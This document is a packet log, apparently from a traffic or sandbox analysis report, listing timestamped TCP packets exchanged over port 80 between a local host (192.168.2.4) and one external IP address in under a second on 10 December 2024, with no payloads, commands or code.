Dec 10, 2024 00:42:23.060070038 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.060111046 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.060158968 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.060894012 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.060904980 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.060947895 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.061690092 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.061741114 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.061788082 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.061836958 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.062556982 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.062567949 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.062603951 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.063530922 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.063585043 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.063992023 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.064040899 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.064205885 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.064217091 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.064250946 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.064282894 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.064985037 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.065035105 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.065220118 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.065284967 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.065846920 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.065856934 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.065886974 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.065902948 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.066644907 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.066688061 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.067069054 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.067116022 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.067493916 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.067547083 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.067771912 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.067821980 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.068305969 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.068361998 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.069080114 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.069130898 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.069156885 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.069166899 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.069204092 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.069955111 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.070004940 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.070127010 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.070178986 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.070791006 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.070837975 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.071686029 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.071696997 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.071707010 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.071738958 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.071765900 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.072429895 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.072482109 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.072669029 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.072715998 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.073272943 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.073340893 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.073797941 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.073848009 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.074131012 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.074141026 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.074182034 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.074939013 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.074986935 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.075014114 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.075061083 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.075807095 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.075851917 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.121587992 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.240822077 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.557239056 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.557317972 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.557650089 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.557662964 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.557686090 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.557702065 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.557754993 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.558084011 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.558146000 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.558294058 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.558343887 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.558959007 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.559005976 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.559797049 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.559808016 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.559849977 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.559866905 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.559904099 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.560581923 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.560633898 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.561194897 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.561244965 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.561441898 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.561458111 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.561494112 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.561506033 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.562235117 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.562283993 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.563124895 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.563134909 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.563174963 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.563180923 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.563309908 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.563884020 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.563951015 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.564758062 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.564768076 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.564811945 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.564836979 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.564882040 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.565642118 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.565694094 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.565804005 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.565853119 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.566436052 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.566446066 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.566485882 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.567198038 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.567250967 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.567306995 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.567357063 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.568149090 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.568159103 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.568192005 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.568205118 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.569091082 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.569104910 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.569138050 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.569154978 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.569714069 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.569761992 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.569788933 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.569832087 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.570554018 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.570602894 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.571053982 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.571106911 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.571393013 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.571403027 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.571445942 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.572251081 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.572261095 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.572300911 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.573092937 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.573103905 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.573143959 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.573853016 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.573901892 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.574049950 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.574100971 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.574670076 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.574719906 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.575273991 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.575329065 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.575495005 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.575551033 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.679600000 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.679692030 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.679792881 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.679846048 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.680022001 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.680075884 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.680430889 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.680480957 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.680851936 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.680903912 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.680933952 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.680979013 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.681466103 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.681513071 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.681680918 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.681730986 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.682296991 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.682348013 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.682368994 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.682409048 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.683185101 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.683195114 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.683237076 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.683958054 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.684011936 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.684029102 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.684072971 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.684824944 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.684835911 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.684886932 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.685014009 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.685611010 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.685658932 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.686316013 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.686367035 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.686463118 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.686511040 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.686534882 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.686573982 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.687302113 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.687352896 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.687369108 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.687411070 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.688102961 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.688153982 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.688231945 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.688280106 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.688971043 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.689028978 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.689080954 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.689758062 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.689810991 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.690016031 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.690067053 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.690596104 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.690644026 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.691243887 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.691390991 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.691441059 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.691462040 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.691504955 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.692256927 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.692303896 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.692336082 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.692385912 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.693087101 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.693150997 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.693212986 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.693259954 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.693912029 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.693924904 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.693957090 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.693969011 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.694721937 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.694771051 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.694772959 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.694811106 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.695626974 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.695674896 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.695682049 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.695722103 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.696424007 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.696435928 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.696479082 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.697222948 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.697287083 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.697535038 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.697623968 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.698081017 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.698091984 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.698127985 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.698904037 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.698915005 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.698978901 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.699686050 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.700098038 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.700165033 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.700571060 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.700582027 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.700623035 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.701339006 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.701437950 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.701488972 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.702186108 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.702234030 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.702559948 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.702613115 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.703015089 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.703063011 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.703327894 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.703382015 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.804992914 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.805442095 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.805454969 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.805555105 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.805578947 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.805664062 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.805710077 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.806387901 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.806441069 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.806482077 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.806523085 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.807230949 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.807307005 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.807358027 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.808041096 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.808089972 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.808151960 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.808198929 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.808868885 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.808913946 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.808938980 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.808976889 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.809696913 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.809751034 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.809777975 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.809815884 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.810542107 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.810553074 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.810595989 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.811371088 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.811470985 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.811527014 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.812206984 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.812261105 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.812295914 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.812339067 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.813020945 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.813059092 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.813069105 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.813096046 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.813874006 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.813924074 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.813976049 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.814016104 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.814721107 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.814857006 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.814904928 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.815500975 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.815572977 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.815624952 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.816339970 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.816386938 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.816452026 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.816495895 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.817162991 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.817195892 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.817207098 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.817229986 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.818027973 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.818056107 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.818069935 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.818090916 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.818826914 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.818870068 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.819046021 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.819087982 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:23.819643974 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.819691896 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:23.819741011 CET	49749	80	192.168.2.4	185.215.113.206
